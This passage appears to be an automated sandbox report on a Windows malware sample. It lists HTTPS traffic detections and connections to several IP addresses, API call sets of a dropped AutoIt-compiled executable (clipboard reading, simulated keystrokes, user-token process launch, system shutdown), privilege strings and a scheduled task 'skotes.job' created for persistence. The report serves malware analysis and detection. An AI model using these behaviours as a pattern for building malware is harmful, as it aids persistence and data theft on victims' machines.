                                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61024 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61127 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61075
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61076
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61078
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61079
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61091
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61092
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61093
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61094
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61095
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61023 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61103 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61086
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61087
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61088
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61162 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61139 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61082 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61071 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61097
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61098
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61099
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61012 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61140 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61150
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61030
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61151
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61025 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61048 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61028
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61149
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61029
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61141
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61021
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61142
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61022
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61143
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61023
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61144
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61024
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61025
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61146
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61026
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61128 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61147
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61027
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61148
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61080 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61059 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61160
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61040
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61041
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61162
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61039
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61151 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61152
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61153
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61154
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61155
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61156
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61157
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61037
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61158
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61014 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61159
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61081 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61170
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61171
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61051
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61172
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61052
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61173
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61152 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61042
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61163
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61043
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61164
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61044
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61165
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61045
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61166
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61167
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61168
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61048
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61169
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61013 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61049
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61060
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61061
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61062
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61063
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61174 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61092 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61174
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61054
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61055
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61176
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61058
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61059
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61129 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61163 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61153 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61176 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61101 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61015 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61164 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61141 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61084 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61112 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61049 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61130 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61073 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61165 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61085 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61062 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49737 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49792 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49893 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49900 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61026 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61043 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61176 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:61189 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61190 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00B9EAFF
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00B9ED6A
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00B9EAFF
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,6_2_00B8AA57
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BB9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00BB9576

                                System Summary

                                barindex
                                Source: 84d280a9e8.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                Source: 84d280a9e8.exe, 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1b54855c-2
                                Source: 84d280a9e8.exe, 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ab99bae5-9
                                Source: 84d280a9e8.exe, 00000019.00000002.2952681186.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40b8bba8-2
                                Source: 84d280a9e8.exe, 00000019.00000002.2952681186.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_318f3c19-f
                                Source: 84d280a9e8.exe, 0000004E.00000002.2952378189.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_386f8b28-7
                                Source: 84d280a9e8.exe, 0000004E.00000002.2952378189.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4116132c-1
                                Source: 84d280a9e8.exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a51a73cd-8
                                Source: 84d280a9e8.exe.5.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_77806d17-b
                                Source: random[1].exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2199ef9a-4
                                Source: random[1].exe.5.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cb341c9f-1
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name:
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: .idata
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name:
                                Source: skotes.exe.0.drStatic PE information: section name:
                                Source: skotes.exe.0.drStatic PE information: section name: .idata
                                Source: skotes.exe.0.drStatic PE information: section name:
                                Source: random[1].exe0.5.drStatic PE information: section name:
                                Source: random[1].exe0.5.drStatic PE information: section name: .rsrc
                                Source: random[1].exe0.5.drStatic PE information: section name: .idata
                                Source: random[1].exe0.5.drStatic PE information: section name:
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name:
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: .rsrc
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: .idata
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name:
                                Source: num[1].exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: num.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8D5EB: CreateFileW,DeviceIoControl,CloseHandle,6_2_00B8D5EB
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00B81201
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00B8E8F6
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DAE5305_2_00DAE530
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DE78BB5_2_00DE78BB
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DE70495_2_00DE7049
